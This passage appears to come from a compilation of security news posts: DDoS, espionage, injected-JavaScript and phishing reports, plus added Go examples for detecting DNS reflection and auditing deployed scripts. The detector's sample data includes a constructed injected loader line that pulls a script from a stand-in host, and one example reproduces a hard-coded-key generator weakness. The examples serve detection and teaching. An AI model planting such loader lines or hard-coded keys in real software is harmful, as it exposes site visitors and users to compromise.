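package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"encoding/binary"
	"fmt"
	"time"
)

// blockSize is the AES block size; X9.31 works on whole cipher blocks.
const blockSize = 16

// X931 implements the ANSI X9.31 construction with AES as the block cipher:
//
//	I = E_K(T)        T: timestamp/date-time block
//	R = E_K(I xor V)  R: the output block
//	V = E_K(R xor I)  V: next seed value (internal state)
//
// K is the "seed key" the article discusses; V is the seed value.
type X931 struct {
	blk cipher.Block
	v   [blockSize]byte
}

// NewX931 builds a generator from a 16/24/32-byte AES key and an initial seed V.
func NewX931(key []byte, seedV [blockSize]byte) (*X931, error) {
	blk, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	return &X931{blk: blk, v: seedV}, nil
}

// Next returns one output block for timestamp block t and advances V.
func (g *X931) Next(t [blockSize]byte) [blockSize]byte {
	var i, r, tmp [blockSize]byte
	g.blk.Encrypt(i[:], t[:])
	xorBlocks(&tmp, &i, &g.v)
	g.blk.Encrypt(r[:], tmp[:])
	xorBlocks(&tmp, &r, &i)
	g.blk.Encrypt(g.v[:], tmp[:])
	return r
}

func xorBlocks(dst, a, b *[blockSize]byte) {
	for k := range dst {
		dst[k] = a[k] ^ b[k]
	}
}

// TimestampBlock packs a wall-clock time and a counter into the T input.
// This layout is an assumption for the example; real devices differ.
func TimestampBlock(ts time.Time, counter uint64) [blockSize]byte {
	var t [blockSize]byte
	binary.BigEndian.PutUint64(t[:8], uint64(ts.UnixNano()))
	binary.BigEndian.PutUint64(t[8:], counter)
	return t
}

// hardcodedKey and fixedSeed are constructed placeholders standing in for
// values baked into firmware; they are NOT taken from any real product.
var hardcodedKey = []byte("firmware-seedkey") // 16 bytes = AES-128
var fixedSeed = [blockSize]byte{1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16}

// HardcodedKeyIsReproducible shows the DUHK precondition: generators sharing
// K, V and T emit identical output. Returns true when the outputs match.
func HardcodedKeyIsReproducible(t [blockSize]byte) (bool, error) {
	a, err := NewX931(hardcodedKey, fixedSeed)
	if err != nil {
		return false, err
	}
	b, err := NewX931(hardcodedKey, fixedSeed)
	if err != nil {
		return false, err
	}
	ra, rb := a.Next(t), b.Next(t)
	return bytes.Equal(ra[:], rb[:]), nil
}

// FreshKeyDiffers is the mitigation the article describes: draw K (and V)
// from the OS CSPRNG at startup. Returns true when two such generators
// fed the same T still produce different output.
func FreshKeyDiffers(t [blockSize]byte) (bool, error) {
	mk := func() (*X931, error) {
		key := make([]byte, blockSize)
		var v [blockSize]byte
		if _, err := rand.Read(key); err != nil {
			return nil, err
		}
		if _, err := rand.Read(v[:]); err != nil {
			return nil, err
		}
		return NewX931(key, v)
	}
	a, err := mk()
	if err != nil {
		return false, err
	}
	b, err := mk()
	if err != nil {
		return false, err
	}
	ra, rb := a.Next(t), b.Next(t)
	return !bytes.Equal(ra[:], rb[:]), nil
}

func main() {
	t := TimestampBlock(time.Now(), 0)
	same, _ := HardcodedKeyIsReproducible(t)
	diff, _ := FreshKeyDiffers(t)
	fmt.Println("hard-coded key reproducible:", same, "| fresh key diverges:", diff)
}
```

The point of the two checks is that the construction itself is sound only while K stays secret: once K is fixed in firmware, the output is a deterministic function of a low-entropy timestamp and a state block, which is exactly what the "practical state recovery" in the paper's title refers to.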
  11. UPDATE – UltraDNS said it has mitigated a distributed denial of service (DDoS) attack for most of its customers after the service was held down for most of the day.

“Currently, only customers utilizing a segment of UltraDNS Name Server addresses are experiencing resolution latency due to intermittent network saturation in the Western US,” said Neustar director of product management, security solutions, Jim Fink in an email to Threatpost. “We continue to aggressively refine mitigations for these customers and hope to have the issue resolved shortly. We have been and will continue to provide regular updates to our UltraDNS customers via our usual customer notification process.” UltraDNS is a Neustar company.

The SANS Institute’s Internet Storm Center said this afternoon that it received multiple reports of outages and DNS resolution issues, reportedly because of a 100 Gbps DDoS attack against one of UltraDNS’ customers that resulted in latency issues for others.

“One reporting party did indicate that they learned that the management of UltraDNS had said that one of their customers was being attacked and that they black-holed that customer to get back on trend,” wrote ISC handler Russ McRee. “Resolver nodes around the world are resetting.”

DDoS attacks the size of this one are quickly becoming the norm. A report from Arbor Networks this week said it has already tracked more than 70 DDoS attacks of 100 Gbps or more of bad traffic, topping out at 325 Gbps. The largest attacks on public record were recorded by traffic optimization and security provider CloudFlare. Most volumetric attacks rely on some kind of amplification such as DNS reflection or Network Time Protocol amplification attacks, where the requesting IP address is spoofed as the target’s and massive amounts of traffic are returned at relatively little cost to the attacker.

With DNS amplification attacks, attackers take advantage of any number of the 28 million open DNS resolvers on the Internet to launch large-scale DDoS attacks. The motivations are varied. Ideological hackers use them to take down services in protest, while profit-motivated criminals can use DDoS as a cover for intellectual property theft and financial fraud. Beginning with the DDoS attacks against large U.S. banks early last year, the spike in these attacks merited a mention in the recent Verizon Data Breach Investigations Report.

“We’re seeing a growing trend of combining DDoS with APT campaigns,” said Arbor Networks’ Gary Sockrider. “Go back a few years, and DDoS was thought of more as a takedown mechanism, not for data exfiltration. Now we’re seeing it more frequently combined with APT, prolonged campaigns where an attacker is on your network and now needs to get the data out, they’ll initiate a DDoS attack. It’s the equivalent of a natural disaster and while you’re dealing with it, that’s when they’ll exfiltrate data.”

Source
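The post explains the reflection pattern (queries sent with the victim's spoofed address, large answers returned by open resolvers) but not how a network team would spot a target on its own netflow. The following is an added Go example, not code from Threatpost, Neustar or Arbor Networks, that aggregates DNS responses per destination from constructed flow records and flags destinations that receive a large volume of answers from many resolvers while having sent no, or disproportionately few, queries themselves. The CSV layout, IP addresses and thresholds are assumptions made for the example.

```go
package main

import (
	"fmt"
	"math"
	"sort"
	"strconv"
	"strings"
)

// Flow is one summarized UDP flow as a collector might export it.
type Flow struct {
	Src   string
	SPort int
	Dst   string
	DPort int
	Bytes int
}

// sampleFlows is constructed sample data, not a real capture. The 198.51.100.x
// hosts play open resolvers, 203.0.113.10 is the spoofed victim (it never sent a
// query), and 203.0.113.20 is a normal client doing an ordinary lookup.
const sampleFlows = `
198.51.100.1,53,203.0.113.10,33000,4000
198.51.100.2,53,203.0.113.10,33000,4000
198.51.100.3,53,203.0.113.10,33000,4000
198.51.100.4,53,203.0.113.10,33000,4000
198.51.100.5,53,203.0.113.10,33000,4000
198.51.100.6,53,203.0.113.10,33000,4000
198.51.100.7,53,203.0.113.10,33000,4000
198.51.100.8,53,203.0.113.10,33000,4000
203.0.113.20,51000,198.51.100.1,53,60
198.51.100.1,53,203.0.113.20,51000,120
203.0.113.20,51001,192.0.2.5,443,1500
`

// ParseFlows reads "src,sport,dst,dport,bytes" lines; blank lines are skipped.
func ParseFlows(s string) ([]Flow, error) {
	var out []Flow
	for n, line := range strings.Split(s, "\n") {
		line = strings.TrimSpace(line)
		if line == "" {
			continue
		}
		f := strings.Split(line, ",")
		if len(f) != 5 {
			return nil, fmt.Errorf("line %d: want 5 fields, got %d", n+1, len(f))
		}
		sp, err1 := strconv.Atoi(f[1])
		dp, err2 := strconv.Atoi(f[3])
		b, err3 := strconv.Atoi(f[4])
		if err1 != nil || err2 != nil || err3 != nil {
			return nil, fmt.Errorf("line %d: malformed integer field", n+1)
		}
		out = append(out, Flow{Src: f[0], SPort: sp, Dst: f[2], DPort: dp, Bytes: b})
	}
	return out, nil
}

// Suspect describes a destination that looks like a DNS reflection victim.
type Suspect struct {
	Dst           string
	ResponseBytes int
	QueryBytes    int
	Sources       int     // distinct resolvers answering this destination
	Ratio         float64 // response/query bytes; +Inf when no queries were sent
}

// ReflectionSuspects sums DNS responses (UDP source port 53) per destination,
// compares them with the queries that same host sent to port 53, and flags hosts
// receiving at least minBytes from at least minSources resolvers with a
// response:query ratio of minRatio or more. A spoofed victim usually sent no
// queries at all, which shows up as an infinite ratio.
func ReflectionSuspects(flows []Flow, minBytes, minSources int, minRatio float64) []Suspect {
	type agg struct {
		resp, query int
		srcs        map[string]bool
	}
	byHost := map[string]*agg{}
	get := func(ip string) *agg {
		a, ok := byHost[ip]
		if !ok {
			a = &agg{srcs: map[string]bool{}}
			byHost[ip] = a
		}
		return a
	}
	for _, f := range flows {
		switch {
		case f.SPort == 53: // an answer arriving at f.Dst
			a := get(f.Dst)
			a.resp += f.Bytes
			a.srcs[f.Src] = true
		case f.DPort == 53: // a query sent by f.Src
			get(f.Src).query += f.Bytes
		}
	}
	var out []Suspect
	for host, a := range byHost {
		if a.resp < minBytes || len(a.srcs) < minSources {
			continue
		}
		ratio := math.Inf(1)
		if a.query > 0 {
			ratio = float64(a.resp) / float64(a.query)
		}
		if ratio < minRatio {
			continue
		}
		out = append(out, Suspect{host, a.resp, a.query, len(a.srcs), ratio})
	}
	sort.Slice(out, func(i, j int) bool { return out[i].ResponseBytes > out[j].ResponseBytes })
	return out
}

func main() {
	flows, err := ParseFlows(sampleFlows)
	if err != nil {
		panic(err)
	}
	for _, s := range ReflectionSuspects(flows, 10000, 5, 10) {
		fmt.Printf("%s: %d response bytes from %d resolvers, %d query bytes, ratio %.1f\n",
			s.Dst, s.ResponseBytes, s.Sources, s.QueryBytes, s.Ratio)
	}
}
```

The thresholds are deliberately parameters: on a real collector the byte floor is set from the link size, and the "many distinct resolvers, no outbound queries" signal is what separates a reflection victim from a busy but legitimate recursive resolver.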
  12. Germany's aeronautics and space research center has for months been the target of a suspected cyber attack by a foreign intelligence service, a German news weekly reported Sunday.

Der Spiegel said that several computers used by scientists and systems administrators at the Cologne-based DLR center had been infiltrated by spy programs. "The government classes the attack as extremely serious because it, among other things, is aimed at armament and rocket technologies," Spiegel said.

In some computers IT experts found traces of spy programs that were set up to destroy themselves on discovery, while others only activated themselves after months of lying in wait. Spiegel said the attacks were "coordinated and systematic" and all the center's operating systems were affected.

IT forensic experts probing who could be behind the assault have turned up clues that seem to point to China, but Spiegel quoted an unidentified "insider" as saying they could also simply be "camouflage". Government sources said the case was being investigated but declined to confirm any details.

The German aeronautics and space research center is active in the fields of aeronautics, space, energy, transport and security and is involved in international cooperative ventures, according to its website.

Source
  13. Threat researchers from Cisco have shared details on a new and rapidly spreading attack targeting web servers running on systems powered by outdated versions of Linux.

According to Cisco, upwards of 400 different hosts were affected each day on March 17 and 18, with attackers successfully compromising more than 2,700 URLs at the time of publishing. The attackers are compromising legitimate websites, Cisco said, with most of the affected web servers running on the Linux 2.6 kernel—an outdated version that was first released in 2003. Compromised servers have been found throughout the world, with a particularly high concentration in Germany and the United States.

“It is possible that attackers have identified a vulnerability on the platform and been able to take advantage of the fact that these are older systems that may not be continuously patched by administrators,” Cisco’s Martin Lee wrote in a blog post late Thursday.

In order to execute the attack, cybercriminals compromise an existing website and insert a line of JavaScript into multiple .js files hosted on the site, causing visitors to load and execute a new JavaScript file served from a compromised third-party host.

“We observed the second stage sites serving what appears to be pay per view fraud pages, where the visitor’s browser loads multiple advertisements to generate revenue for the attacker,” Lee said. “However, there is anecdotal evidence that visitors have been infected with Trojan malware as part of this final step.”

Many of the affected hosts have been identified as compromised and cleaned, Cisco said. Lee explained that some security products may detect the JavaScript redirect as being similar to that previously used in the Blackhole exploit kit, but Cisco has no evidence suggesting that the attacks are related to Blackhole rather than an example of code reuse.

“This large-scale compromise of an aging operating system highlights the risks posed by leaving such systems in operation,” Lee said. "Systems that are unmaintained or unsupported are no longer patched with security updates," he continued. "When attackers discover a vulnerability in the system, they can exploit it at their whim without fear of it being remedied. In April 2014, Windows XP will become unsupported. Organizations urgently need to review their use of unsupported systems in operation. Such systems need to be upgraded where possible, or regularly monitored to detect compromise."

Just yesterday, researchers from Imperva issued a threat advisory about an old PHP vulnerability that was patched in 2012 but is actively being exploited in attacks. While this particular PHP flaw was discovered in March 2012 and patched in May, a public exploit began making the rounds in October 2013, Imperva said in its advisory. Imperva's honeypots detected more than 30,000 campaigns using some form of the exploit within three weeks of its publication. The fact that the exploit became publicly available more than a year later suggests criminals were still enjoying some degree of success targeting this vulnerability, Barry Shteiman, director of security strategy at Imperva, told SecurityWeek.

“Large numbers of vulnerable unpatched systems on the Internet are tempting targets for attackers,” Cisco’s Lee said. “Such systems can be used as disposable one-shot platforms for launching attacks. This makes it all the more important that aging systems are properly maintained and protected.”

Cisco has provided a list of compromised URLs here and here, which can be used for blacklisting and URL filtering in order to prevent users from visiting those pages.

Earlier this week, ESET warned of a widespread attack campaign that has infected more than 25,000 Linux and UNIX servers around the world. According to ESET, the servers are being hijacked by a backdoor Trojan as part of a campaign the researchers are calling 'Operation Windigo.' Once infected, victimized systems are leveraged to steal credentials, redirect web traffic to malicious sites and send as much as 35 million spam messages a day.

Source
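The Cisco report above describes the tampering (a loader line appended to several of a site's own .js files) but not the two checks a site owner can run to catch it: comparing deployed files against a digest manifest taken at deploy time, and scanning for script-loading statements that point at hosts outside an allow list. The following is an added Go example, not code from Cisco, Imperva or ESET; the file contents, paths, hostnames and the regular expression for loader statements are constructed for illustration.

```go
package main

import (
	"crypto/sha256"
	"encoding/hex"
	"fmt"
	"regexp"
	"sort"
	"strings"
)

// Sha256Hex returns the lowercase hex SHA-256 digest of a file's contents.
func Sha256Hex(content string) string {
	sum := sha256.Sum256([]byte(content))
	return hex.EncodeToString(sum[:])
}

// externalSrc matches a "src=" attribute or property assignment that loads from an
// absolute http(s) URL and captures the host. It covers both s.src='https://host/x.js'
// and the <script src="http://host/x.js"> string inside a document.write call.
var externalSrc = regexp.MustCompile(`(?i)src\s*=\s*["']?https?://([^/"'\s>]+)`)

// Finding is one deployed file that deserves a look.
type Finding struct {
	Path    string
	Changed bool     // digest differs from the baseline manifest
	NewFile bool     // no baseline entry exists for this path
	Hosts   []string // external hosts code is loaded from, minus allowed ones
}

// ExternalHosts returns the distinct, non-allowed hosts a script pulls code from.
func ExternalHosts(content string, allowed map[string]bool) []string {
	seen := map[string]bool{}
	var hosts []string
	for _, m := range externalSrc.FindAllStringSubmatch(content, -1) {
		h := strings.ToLower(m[1])
		if allowed[h] || seen[h] {
			continue
		}
		seen[h] = true
		hosts = append(hosts, h)
	}
	sort.Strings(hosts)
	return hosts
}

// AuditJS compares deployed files (path -> content) against a baseline manifest of
// SHA-256 digests (path -> hex digest) recorded at deploy time and reports files that
// changed, are new, or load code from hosts outside the allow list.
func AuditJS(files, baseline map[string]string, allowed map[string]bool) []Finding {
	var out []Finding
	for path, content := range files {
		want, known := baseline[path]
		f := Finding{
			Path:    path,
			NewFile: !known,
			Changed: known && want != Sha256Hex(content),
			Hosts:   ExternalHosts(content, allowed),
		}
		if f.NewFile || f.Changed || len(f.Hosts) > 0 {
			out = append(out, f)
		}
	}
	sort.Slice(out, func(i, j int) bool { return out[i].Path < out[j].Path })
	return out
}

// Constructed sample site: one clean file that legitimately loads from an allowed CDN,
// one file with an appended loader line, and one file nobody deployed.
const cleanApp = "(function(){ var s=document.createElement('script'); s.src='https://static.example.org/lib.js'; document.head.appendChild(s); })();\n"
const cleanVendor = "/*! vendor lib */ window.vendor = { version: '1.0' };\n"
const injectedLine = "document.write('<script src=\"http://third-party.invalid/stat.js\"></script>');\n"

// SampleFiles returns the deployed files, the manifest taken at deploy time, and the
// allow list of hosts the site is expected to load scripts from.
func SampleFiles() (files, baseline map[string]string, allowed map[string]bool) {
	baseline = map[string]string{
		"js/app.js":    Sha256Hex(cleanApp),
		"js/vendor.js": Sha256Hex(cleanVendor),
	}
	files = map[string]string{
		"js/app.js":    cleanApp,
		"js/vendor.js": cleanVendor + injectedLine, // tampered after deploy
		"js/extra.js":  "console.log('not in manifest');\n",
	}
	allowed = map[string]bool{"static.example.org": true}
	return
}

func main() {
	for _, f := range AuditJS(SampleFiles()) {
		fmt.Printf("%-14s changed=%v new=%v external=%v\n", f.Path, f.Changed, f.NewFile, f.Hosts)
	}
}
```

The digest comparison is the reliable check (any appended line changes the hash); the loader scan is a triage aid that tells you which changed files are worth reading first, and it is deliberately host-based rather than keyed to any particular script name because the second-stage host changes between campaigns.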
  14. By Manish Singh on February 11, 2014 - 07:18PM

The Internet, much like the real world, has bad people too. And while the digital security of the entire planet seems to be a train-wreck, things are even worse in India. According to Microsoft’s third annual Computing Safety Index (MCSI) report, 20% of Indians are victims of online phishing attacks. The victims in this case lose around Rs. 7500 ($120 USD) on average. “About 12 per cent Indian respondents said they suffered identity theft at an average cost them Rs 7,500," the MCSI states.

The annual worldwide impact of phishing and identity theft is around $5 billion, while fixing people's online reputation could go as high as $6 million. “The annual worldwide impact of phishing and other various forms of identity theft could be as high as $5 billion, with the cost of repairing the damage to peoples' online reputation being higher yet at nearly $6 billion or an estimated average of $632 (Rs 39,000) per loss," the MCSI mentioned.

The survey, which was released today on Safer Internet Day, used data gathered from testing around 10,500 users from across 20 nations. According to the report, only 34% of them care to prevent strangers from seeing their updates on social media, while 38% of people actually tweak some settings to control who sees what. Furthermore, only 35% of the users employed PIN protection to keep their devices secure.

"Internet users can prevent intrusions and thefts by using a unique four-digit PIN for mobile devices and strong passwords for online accounts," Microsoft India National Technology Officer Prakash Kumar said.

It is high time we became aware of online attacks and started using simple preventive measures which can save us a whole lot of trouble. “The Internet touches our lives every day, whether we are communicating with loved ones, for work, shopping, and paying bills. But how cautious are we about monitoring our online presence, and taking note of our own vulnerabilities? There are many things you can do to stay safer online," Kumar added.

http://www.winbeta.org/news/phishing-attacks-20-percent-indians-are-victims-says-microsoft
  15. By Adrienne Hall, General Manager, Trustworthy Computing Group 24 Jan 2014 9:27 AM

Recently, a select number of Microsoft employees’ social media and email accounts were subjected to targeted phishing attacks. This type of attack is not uncommon, and many companies grapple with phishing attempts from cybercriminals (visit www.microsoft.com/sir).

While our investigation continues, we have learned that there was unauthorized access to certain employee email accounts, and information contained in those accounts could be disclosed. It appears that documents associated with law enforcement inquiries were stolen. If we find that customer information related to those requests has been compromised, we will take appropriate action. Out of regard for the privacy of our employees and customers – as well as the sensitivity of law enforcement inquiries – we will not comment on the validity of any stolen emails or documents.

In terms of the cyberattack, we continue to further strengthen our security. This includes ongoing employee education and guidance activities, additional reviews of technologies in place to manage social media properties, and process improvements based on the findings of our internal investigation.

http://blogs.technet.com/b/trustworthycomputing/archive/2014/01/24/post.aspx
  16. Adam Clark Estes January 13, 2014 4:00pm

As you probably suspected, the NSA’s massive phone record collection “has had no discernible impact on preventing acts of terrorism,” according to a new study. In fact—and perhaps more interestingly—the agency’s real problem isn’t a lack of information. It’s an excess of secrecy.

In the study, the New America Foundation reviewed 225 terrorism cases and found that traditional investigation and law enforcement methods actually did the most to prevent attacks. About a third of the leads in terrorism cases came from tips or an informant, while old school surveillance warrants were used in 48 cases. All things told, bulk telephony metadata collection provided evidence in only one case, a case that didn’t even present the threat of an attack against the United States.

The results of the New America Foundation's study are notable but not terribly surprising. After all, President Obama’s own advisory board said a couple weeks ago that the NSA’s program “was not essential to preventing attacks” and that the real useful evidence “could readily have been obtained in a timely manner using conventional [court] orders.” They also agree that the NSA’s secrecy is doing more harm than good.

The timing of the study couldn’t be better. President Obama will announce widespread reforms to the NSA and other government surveillance practices on January 17 and is expected to follow many of the advisory board’s recommendations. Afterwards, maybe the NSA can actually do something other than spy on unwitting Americans. Maybe they can do something useful!

[New America Foundation via Washington

http://www.gizmodo.co.uk/2014/01/nsa-phone-spying-is-useless-in-preventing-terrorist-attacks-study-says

Edit: The above "study" is an interactive figure that shows all variables in detail.

Original Study: http://www.newamerica.net/publications/policy/do_nsas_bulk_surveillance_programs_stop_terrorists

Full Study Report PDF: http://www.newamerica.net/sites/newamerica.net/files/policydocs/Bergen_NAF_NSA%20Surveillance_1.pdf